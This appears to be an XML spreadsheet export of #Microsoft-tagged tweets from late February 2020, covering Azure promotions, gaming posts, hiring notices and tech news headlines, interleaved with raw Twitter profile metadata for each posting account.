    <t>{'id': 832620827833094147, 'id_str': '832620827833094147', 'name': 'Sam David Management | Black World Studios', 'screen_name': 'SamDavidStudios', 'location': 'United States', 'description': 'Activist-advocate of healthy living. TV/film veteran entertainment exec/producer heads eponymous talent management firm, literary agency + Black World Studios.', 'url': 'https://t.co/TZyk03g3ge', 'entities': {'url': {'urls': [{'url': 'https://t.co/TZyk03g3ge', 'expanded_url': 'http://www.SamDavidManagement.com', 'display_url': 'SamDavidManagement.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 808, 'friends_count': 749, 'listed_count': 4, 'created_at': 'Fri Feb 17 16:00:49 +0000 2017', 'favourites_count': 8536, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 33925,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'http://pbs.twimg.com/profile_images/1170549276172156928/JUZUyvgI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170549276172156928/JUZUyvgI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/832620827833094147/1567918698', 'profile_link_color': 'C5B358',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</si>
  <si>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00:37:21 +0000 2020</t>
  </si>
  <si>
    <t>Project CARS 2 Deluxe Edition aprimorado com XBOX ONE X ENHANCED
https://t.co/0VLbfs3rqt
#projectcars #projectcars2 #xbox #xboxone #xboxonex #xboxlive #microsoft #steam #playstation #pc #console #jogos #games #game #gaming #gamedev #videogames #videogame #gamer #gamers https://t.co/Ki4H1AjYPw</t>
  </si>
  <si>
    <t>Sat Feb 29 00:35:05 +0000 2020</t>
  </si>
  <si>
    <t>@jamesbmarshall @Azure Working for a #Microsoft partner whos core client base is #SMB I would really welcome the opportunity to discuss your #Azure strategy together.</t>
  </si>
  <si>
    <t>{'id': 2217583740, 'id_str': '2217583740', 'name': 'Rob Nice', 'screen_name': 'Rob_Nice_', 'location': 'Berkshire. UK.', 'description': 'Head of Technology and Partnerships. @ccsmedia *My views*', 'url': 'https://t.co/yx3qcnh3MH', 'entities': {'url': {'urls': [{'url': 'https://t.co/yx3qcnh3MH', 'expanded_url': 'http://www.ccsmedia.com', 'display_url': 'ccsmedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 553, 'friends_count': 871, 'listed_count': 51, 'created_at': 'Wed Nov 27 10:56:47 +0000 2013', 'favourites_count': 1148, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1600, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': 'C6E2EE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/822408218391494656/uOa2wc7y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/822408218391494656/uOa2wc7y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2217583740/1547081081',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</si>
  <si>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Sat Feb 29 00:33:18 +0000 2020</t>
  </si>
  <si>
    <t>Runaway mouse in your Microsoft Office programs? Try these easy tips to select text &amp;amp; data https://t.co/SN2Exq7tpb
#Microsoft
#Office https://t.co/eotKWhYLXk</t>
  </si>
  <si>
    <t>Sat Feb 29 00:32:14 +0000 2020</t>
  </si>
  <si>
    <t>#Bitcoin Mixing, Stolen Identities and Fake Tax Returns Used to Defraud #Microsoft of More Than $10 Million
https://t.co/bPBOfDceJL https://t.co/l3oYJmls1b</t>
  </si>
  <si>
    <t>Sat Feb 29 00:31:59 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 00:31:36 +0000 2020</t>
  </si>
  <si>
    <t>LA Times | In Cali, #Facebook, #Microsoft, and #EpicGames cancel California conference plans over #coronavirus.
Learn more . . . https://t.co/W1ImF4jtmH</t>
  </si>
  <si>
    <t>{'id': 27421681, 'id_str': '27421681', 'name': 'bdpatoday', 'screen_name': 'bdpatoday', 'location': 'Washington, D.C.', 'description': 'â–º bdpatoday (https://t.co/275rqyWATb â€¢ ISSN 1946-1429) is a serial tech publication curated by BDPA Chapters (https://t.co/m1Xk5xeriE) with ICT Industry for corporate development.', 'url': 'https://t.co/tuPxCv7aRY', 'entities': {'url': {'urls': [{'url': 'https://t.co/tuPxCv7aRY', 'expanded_url': 'https://bdpatoday.com', 'display_url': 'bdpatoday.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/275rqyWATb', 'expanded_url': 'http://bdpatoday.com', 'display_url': 'bdpatoday.com', 'indices': [13, 36]}, {'url': 'https://t.co/m1Xk5xeriE', 'expanded_url': 'http://bdpa2020.com', 'display_url': 'bdpa2020.com', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 1545, 'friends_count': 2348, 'listed_count': 349, 'created_at': 'Sun Mar 29 13:14:11 +0000 2009', 'favourites_count': 9157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31825,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'http://pbs.twimg.com/profile_images/470968236960260096/WekOtPgN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/470968236960260096/WekOtPgN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27421681/1565135910', 'profile_link_color': '336699',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</si>
  <si>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Sat Feb 29 00:29:59 +0000 2020</t>
  </si>
  <si>
    <t>Wondering what are the #skills, you should master to become a #PowerBI #Developer? Find out here https://t.co/bKYupSOl0T
#career #BI #Tech #SaturdayMotivation #Microsoft 
.</t>
  </si>
  <si>
    <t>Sat Feb 29 00:24:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 Knowledge Series Episode 3: Management and Security https://t.co/Gjuu5bI2kq #Microsoft #Microsoft365 https://t.co/vYk8f694II</t>
  </si>
  <si>
    <t>{'id': 19356794, 'id_str': '19356794', 'name': 'Petri', 'screen_name': 'PetriFeed', 'location': '', 'description': 'Check out the Petri IT Knowledgebase for the latest in IT and tech coverage, including how-to articles, news, and reviews for #sysadmin. Work Smarter.', 'url': 'https://t.co/CSbIq0r0jr', 'entities': {'url': {'urls': [{'url': 'https://t.co/CSbIq0r0jr', 'expanded_url': 'https://www.petri.com', 'display_url': 'petri.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7478, 'friends_count': 291, 'listed_count': 453, 'created_at': 'Thu Jan 22 19:48:13 +0000 2009', 'favourites_count': 169, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12365,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'http://pbs.twimg.com/profile_images/1189966254649544704/fCY3Z7sy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189966254649544704/fCY3Z7sy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19356794/1572544338',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</si>
  <si>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Sat Feb 29 00:21:18 +0000 2020</t>
  </si>
  <si>
    <t>My new setup #twitch #twitchstreamer #mixer #mixerstreaming #gaming #xbox #xboxone #playstation #playstation4 #asus #razer #corsair #elgato #gamecapture #steelseries #acer #hp #dell #alienware #logitech #youtube #youtuber #turtlebeach #hyperx #lg #sony #microsoft #custom https://t.co/L8GDjgsYT9</t>
  </si>
  <si>
    <t>Sat Feb 29 00:18:03 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "The Week in Ransomware - February 28th 2020 - Data Leaks Everywhere:" https://t.co/gkTEAqkcZe
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Sat Feb 29 00:17:00 +0000 2020</t>
  </si>
  <si>
    <t>@zacbowden why do #microsoft always do that? they tend to destroy the thing they created. :(</t>
  </si>
  <si>
    <t>{'id': 853909064845213696, 'id_str': '853909064845213696', 'name': 'ein niemand', 'screen_name': 'justaljohn', 'location': 'N O W H E R E', 'description': 'Just a self centered bastard', 'url': 'https://t.co/jQXTtpOOXc', 'entities': {'url': {'urls': [{'url': 'https://t.co/jQXTtpOOXc', 'expanded_url': 'http://curiouscat.me/justaljohn', 'display_url': 'curiouscat.me/justaljohn', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 291, 'listed_count': 0, 'created_at': 'Mon Apr 17 09:52:40 +0000 2017', 'favourites_count': 416, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 586,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'http://pbs.twimg.com/profile_images/1152839272388386816/P-Kn_xxR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152839272388386816/P-Kn_xxR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/853909064845213696/1566717899',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</si>
  <si>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00:12:37 +0000 2020</t>
  </si>
  <si>
    <t>Brief article on my experience, and preparation, for the Microsoft Certified Azure Solutions Architect Expert
#Microsoft  #Azure  #AzureFamily 
https://t.co/31bAgXbTJF</t>
  </si>
  <si>
    <t>Sat Feb 29 00:12:34 +0000 2020</t>
  </si>
  <si>
    <t>The February 28th Weekly Roundup is Posted! #Microsoft  https://t.co/tLeXRZfSv9</t>
  </si>
  <si>
    <t>Sat Feb 29 00:09:19 +0000 2020</t>
  </si>
  <si>
    <t>Our team charter is growing and I am hiring! I have two new positions at #Microsoft we opened today. Are YOU that person? Do you know that person?</t>
  </si>
  <si>
    <t>{'id': 3285539856, 'id_str': '3285539856', 'name': 'erikaehrli ðŸ‘©ðŸ»\u200dðŸ’»ðŸ‰', 'screen_name': 'erikaehrli1', 'location': 'Bellevue, WA', 'description': 'Dir Tech Product Marketing @Microsoft. E2E Application Development in Azure. Mom of ðŸ™‡ðŸ»\u200dâ™€ï¸ðŸ™‡ðŸ»\u200dâ™‚ï¸ðŸ™‡ðŸ»\u200dâ™‚ï¸. Proud #womenintech #demoqueen', 'url': 'https://t.co/U5MWWmFXve', 'entities': {'url': {'urls': [{'url': 'https://t.co/U5MWWmFXve', 'expanded_url': 'https://azure.com/developer', 'display_url': 'azure.com/developer', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1125, 'friends_count': 482, 'listed_count': 55, 'created_at': 'Mon Jul 20 16:10:04 +0000 2015', 'favourites_count': 3057, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1683,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'http://pbs.twimg.com/profile_images/1192227801535004672/TIEFcVya_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192227801535004672/TIEFcVya_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3285539856/1573084237',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</si>
  <si>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Sat Feb 29 00:08:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft launches new program for #B2B #startups
https://t.co/dmiYgtNB0A https://t.co/MMNwyhCYgG</t>
  </si>
  <si>
    <t>{'id': 1563626360, 'id_str': '1563626360', 'name': '50Folds', 'screen_name': '50Folds', 'location': 'Asia', 'description': 'Build to the Sun. \nStartup strategy constulting: https://t.co/JwI5gTWmFY\nVenture builder: https://t.co/2ZDRxAQpFB', 'url': 'http://t.co/h6nwLbYV7s', 'entities': {'url': {'urls': [{'url': 'http://t.co/h6nwLbYV7s', 'expanded_url': 'http://50folds.com', 'display_url': '50folds.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/JwI5gTWmFY', 'expanded_url': 'http://strategy.50folds.com', 'display_url': 'strategy.50folds.com', 'indices': [49, 72]}, {'url': 'https://t.co/2ZDRxAQpFB', 'expanded_url': 'http://50folds.com', 'display_url': '50folds.com', 'indices': [90, 113]}]}}, 'protected': False, 'followers_count': 982, 'friends_count': 485, 'listed_count': 146, 'created_at': 'Tue Jul 02 16:52:34 +0000 2013', 'favourites_count': 373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6805,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'http://pbs.twimg.com/profile_images/736601005001986048/3P7dtq6z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/736601005001986048/3P7dtq6z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1563626360/1464454322',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</si>
  <si>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00:04:37 +0000 2020</t>
  </si>
  <si>
    <t>I need a OneDrive expert. #Microsoft</t>
  </si>
  <si>
    <t>{'id': 4003545972, 'id_str': '4003545972', 'name': 'Jimbo Horton', 'screen_name': 'JimboinTexas', 'location': 'Texas Hill Country', 'description': 'Born and raised in Texas. Kimmie Rhodes said I was the coolest.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 112, 'listed_count': 2, 'created_at': 'Sat Oct 24 15:33:15 +0000 2015', 'favourites_count': 1141, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1527,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'http://pbs.twimg.com/profile_images/1132097693394845698/-heWd8dD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1132097693394845698/-heWd8dD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4003545972/1483370113',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</si>
  <si>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00:02:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft invested over $1 billion into developing top-notch security for their cloud so you don't have to. Run your server and store your data with confidence on #Azure. https://t.co/NIrZNZzfoM</t>
  </si>
  <si>
    <t>{'id': 1165206135462232065, 'id_str': '1165206135462232065', 'name': 'Macspear', 'screen_name': 'Macspearsolutio', 'location': 'Kuala Lumpur Federal Territory', 'description': 'Macspear Solution, founded in 2012 with the purpose of delivering the best creative digital solutions.', 'url': 'https://t.co/ShvVBc3zyA', 'entities': {'url': {'urls': [{'url': 'https://t.co/ShvVBc3zyA', 'expanded_url': 'https://macspear.business.site', 'display_url': 'macspear.business.site', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 2, 'listed_count': 0, 'created_at': 'Sat Aug 24 10:16:18 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 95, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1165206236897243137/xHtS2XsO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1165206236897243137/xHtS2XsO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1165206135462232065/1566642283',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</si>
  <si>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Sat Feb 29 00:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins #IBM, #MicroSoft to call for facial recognition regulations 
https://t.co/eSLwdTZ1Dq via @Reuters 
#FacialRecognition #Technology #AI #TechNews #TechPlayers 
cc: @MikeQuindazzi @Ronald_vanLoon @sallyeaves @enricomolinari @FrRonconi https://t.co/dOGatN8asM</t>
  </si>
  <si>
    <t>{'id': 753665337837686784, 'id_str': '753665337837686784', 'name': 'ð’œð“Šð’¹ð“‡ð‘’ð“Ž ð’Ÿð‘’ð’®ð’¾ð“ˆð“‰ð‘œ âœ¨', 'screen_name': 'AudreyDesisto', 'location': 'Boston, Massachusetts', 'description': 'CEO of @Digitalmstream Helping clients with #Technology | #Marketing | #SocialMedia | #AI | Following: #CyberSecurity l #Cloud #TechPlayers ~ Opinions are mine', 'url': 'https://t.co/5W6GUlik82', 'entities': {'url': {'urls': [{'url': 'https://t.co/5W6GUlik82', 'expanded_url': 'http://www.linkedin.com/in/digitalmstream', 'display_url': 'linkedin.com/in/digitalmstrâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14560, 'friends_count': 6498, 'listed_count': 214, 'created_at': 'Thu Jul 14 18:59:53 +0000 2016', 'favourites_count': 35639, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15973,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'http://pbs.twimg.com/profile_images/1218883267606253569/rbiZGEdk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218883267606253569/rbiZGEdk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/753665337837686784/1581198341', 'profile_link_color': 'C98910',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</si>
  <si>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Sat Feb 29 00:00:30 +0000 2020</t>
  </si>
  <si>
    <t>The children of the future!
Microsoft CEO Satya Nadella addresses students at the Young Innovators Summit in Delhi
https://t.co/QqDi2MmVyr
#microsoft #fridayfeeling #satyanadella #younginnovatorssummit</t>
  </si>
  <si>
    <t>Sat Feb 29 00:00:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #AzureSphere is now generally available to secure #IoT devices and processes, and protect organizations #data, privacy, safety and infrastructure: https://t.co/ATFYW5uHT3 #IoTSecurity</t>
  </si>
  <si>
    <t>{'id': 16204970, 'id_str': '16204970', 'name': 'Cincom Systems', 'screen_name': 'Cincom', 'location': 'Cincinnati, OH', 'description': 'Insight &amp; perspective on business technology from the CPQ, ERP and enterprise software innovators at Cincom.', 'url': 'https://t.co/bqcvWnsRxV', 'entities': {'url': {'urls': [{'url': 'https://t.co/bqcvWnsRxV', 'expanded_url': 'https://www.cincom.com/us/', 'display_url': 'cincom.com/us/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2075, 'friends_count': 1374, 'listed_count': 107, 'created_at': 'Tue Sep 09 16:36:36 +0000 2008', 'favourites_count': 336, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9965,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'http://pbs.twimg.com/profile_images/620686919047974912/qhbFdZIg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/620686919047974912/qhbFdZIg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16204970/1445267632', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 00:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 23:58:51 +0000 2020</t>
  </si>
  <si>
    <t>HC SnD messin around. Who wants to game? First post on Twitter!
 #CallofDuty #gamer #xbox #cod #game #pubs #gaming #Microsoft #playstation #stream #twitch #MLG https://t.co/gat80mWCrE</t>
  </si>
  <si>
    <t>{'id': 1188170017470332928, 'id_str': '1188170017470332928', 'name': 'oP Dutchyy', 'screen_name': 'ODutchyy', 'location': '', 'description': 'XBL oP DUTCHYY', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Sat Oct 26 19:06:31 +0000 2019',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'http://pbs.twimg.com/profile_images/1188170229442109440/fJa8--z7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188170229442109440/fJa8--z7_normal.jpg',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</si>
  <si>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23:52:22 +0000 2020</t>
  </si>
  <si>
    <t>Barely a few hours till #ngIndia begins
How's the Josh??
#Angular #ngIndia2020 #MSFTStudentPartner #MVPBuzz #Microsoft #Google @angular @geeknineseven @debug_mode https://t.co/x0zzZ12A2H</t>
  </si>
  <si>
    <t>{'id': 1171127783138816000, 'id_str': '1171127783138816000', 'name': 'Aditya Oberai', 'screen_name': 'adityaoberai1', 'location': 'Noida, India', 'description': "#MSFTStudentPartner |\n#CompTIA Campus Ambassador |\n#CoCampus Campus Ambassador | \n#ngIndia2020 Volunteer Lead |\n\nAmity '22 | Doon '18", 'url': 'https://t.co/cSaYXrdoH9', 'entities': {'url': {'urls': [{'url': 'https://t.co/cSaYXrdoH9', 'expanded_url': 'http://adityaoberai.github.io', 'display_url': 'adityaoberai.github.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 212, 'friends_count': 369, 'listed_count': 0, 'created_at': 'Mon Sep 09 18:27:51 +0000 2019', 'favourites_count': 1843, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 282, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1217191481892659206/Qx_BtNB9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217191481892659206/Qx_BtNB9_normal.jpg',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</si>
  <si>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23:52:05 +0000 2020</t>
  </si>
  <si>
    <t>HCL Technologies CTO @kklive Discusses @hcltech new #Microsoft Business Unit. https://t.co/kDqsWs7OwS https://t.co/4O2uGfl7fQ</t>
  </si>
  <si>
    <t>{'id': 14129987, 'id_str': '14129987', 'name': 'Channel Futures', 'screen_name': 'ChannelFutures', 'location': 'New York (sometimes)', 'description': 'Powering the Digital Services Revolution', 'url': 'https://t.co/vzIl5jpsut', 'entities': {'url': {'urls': [{'url': 'https://t.co/vzIl5jpsut', 'expanded_url': 'http://www.channelfutures.com', 'display_url': 'channelfutures.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25765, 'friends_count': 7991, 'listed_count': 898, 'created_at': 'Wed Mar 12 04:18:15 +0000 2008', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15638,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'http://pbs.twimg.com/profile_images/926127972733603840/o3Upn1cB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/926127972733603840/o3Upn1cB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14129987/1541173235', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '666666', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 23:51:57 +0000 2020</t>
  </si>
  <si>
    <t>Been waiting for this since December. For those #microsoft #powerplatform enthusiasts, this is a pretty neat and decent exercise to put your knowledge and understanding to the test. One more badge adding to my #techintensity #LearnItLiveIt journey! 
https://t.co/Gsbaq6Zj8d</t>
  </si>
  <si>
    <t>{'id': 735640348601417728, 'id_str': '735640348601417728', 'name': 'Jenzus Hsu', 'screen_name': 'jenzushsu', 'location': 'Singapore', 'description': 'Technology Strategist @Microsoft_SG. A closet geek and Star Wars fan. The tweets expressed here represent my own and not those of #Microsoft.', 'url': 'https://t.co/BmumVAZw5Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/BmumVAZw5Y', 'expanded_url': 'http://www.linkedin.com/in/jenzushsu', 'display_url': 'linkedin.com/in/jenzushsu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 229, 'listed_count': 3, 'created_at': 'Thu May 26 01:15:01 +0000 2016', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 303,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'http://pbs.twimg.com/profile_images/735641188565286913/UjOdBs60_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/735641188565286913/UjOdBs60_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/735640348601417728/1564495085',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</si>
  <si>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23:50:45 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 Teams-AzureDevOps
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 23:45:16 +0000 2020</t>
  </si>
  <si>
    <t>Pope Francis' message to Artificial Intelligence Workshop - #Microsoft, IBM, UN-FAO and #Vatican sign Call for Ethics in AI - Full Text - 
https://t.co/BwW7vLAjbm https://t.co/hguQv1Rscw</t>
  </si>
  <si>
    <t>{'id': 158930065, 'id_str': '158930065', 'name': 'JESUS CARITAS EST', 'screen_name': 'JESUSCARITASEST', 'location': '', 'description': 'Breaking CATHOLIC News World, Vatican, Pope Francis, PROLIFE, FREE Movies &amp; more\r\nLIKE http://t.co/NM6YjmdlAq', 'url': 'http://t.co/8SpJIPscJ9', 'entities': {'url': {'urls': [{'url': 'http://t.co/8SpJIPscJ9', 'expanded_url': 'http://jesuscaritasest.org', 'display_url': 'jesuscaritasest.org', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'http://t.co/NM6YjmdlAq', 'expanded_url': 'http://www.facebook.com/jesuscaritasest', 'display_url': 'facebook.com/jesuscaritasest', 'indices': [87, 109]}]}}, 'protected': False, 'followers_count': 3206, 'friends_count': 2431, 'listed_count': 74, 'created_at': 'Thu Jun 24 01:17:02 +0000 2010', 'favourites_count': 906, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23891,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'http://pbs.twimg.com/profile_images/461675818582671360/Xj7sMjp-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/461675818582671360/Xj7sMjp-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/158930065/1413139672',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</si>
  <si>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Feb 28 23:43:40 +0000 2020</t>
  </si>
  <si>
    <t>Hard to believe that February marks 10 years of #Azure! Our CRO @josephlandes took the time to share his perspective on @ ToolboxforIT on this anniversary and why #MSPs and the channel have arguably gained the most from #Microsofts powerful public cloud. https://t.co/ETBRf0XjzM</t>
  </si>
  <si>
    <t>{'id': 274583877, 'id_str': '274583877', 'name': 'Nerdio', 'screen_name': 'GetNerdio', 'location': 'Chicago, IL', 'description': 'The definitive Azure deployment, pricing, packaging, management, and optimization solution for #MSPsâ„¢.', 'url': 'https://t.co/nNeI8BfELD', 'entities': {'url': {'urls': [{'url': 'https://t.co/nNeI8BfELD', 'expanded_url': 'http://www.getnerdio.com', 'display_url': 'getnerdio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1140, 'friends_count': 1430, 'listed_count': 65, 'created_at': 'Wed Mar 30 15:41:49 +0000 2011', 'favourites_count': 819, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5714,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'http://pbs.twimg.com/profile_images/1118530373783314433/XMgiGs-g_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118530373783314433/XMgiGs-g_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/274583877/1555513432', 'profile_link_color': '1B9CB9', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '2B2B2B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 23:39:06 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "US Railroad Contractor Reports Data Breach After Ransomware Attack:" https://t.co/oBQ94VYfGX
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 23:37:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edge #crypto upgrades introduced to counter malicious mining
https://t.co/PPFZXGthEJ https://t.co/EIPDtASy6i</t>
  </si>
  <si>
    <t>Fri Feb 28 23:32:28 +0000 2020</t>
  </si>
  <si>
    <t>I'm really into totally free Oculus Rift right now #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 23:30:43 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/shuCNdcfWL</t>
  </si>
  <si>
    <t>Fri Feb 28 23:30:38 +0000 2020</t>
  </si>
  <si>
    <t>#Google is pushing warnings and alerts aimed at #Microsoft #Edge users who visit the Chrome Web Store, Google Drive, Gmail and https://t.co/7MtGGQLRTA.
@gkeizer @Computerworld 
https://t.co/J0LOmnjCqE</t>
  </si>
  <si>
    <t>{'id': 17075755, 'id_str': '17075755', 'name': 'Val Potter', 'screen_name': 'vpotter', 'location': 'San Francisco', 'description': 'Features editor at @Computerworld. Urbanite, crowd-hater. Early bird, late bloomer. Technology lover, skeptic.', 'url': 'http://t.co/HwokoXQYtp', 'entities': {'url': {'urls': [{'url': 'http://t.co/HwokoXQYtp', 'expanded_url': 'http://www.computerworld.com', 'display_url': 'computerworld.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2507, 'friends_count': 856, 'listed_count': 154, 'created_at': 'Thu Oct 30 22:10:19 +0000 2008', 'favourites_count': 357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5047,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'http://pbs.twimg.com/profile_images/650068080341618688/VxDDIl6H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/650068080341618688/VxDDIl6H_normal.jpg',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</si>
  <si>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23:30:18 +0000 2020</t>
  </si>
  <si>
    <t>Gonna try and enjoy friday night smackdown tonight! 
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #marijuana #maryjane #cannabis #gamerguy #gamer #gamer4life... https://t.co/CuzVtENijF</t>
  </si>
  <si>
    <t>Fri Feb 28 23:27:12 +0000 2020</t>
  </si>
  <si>
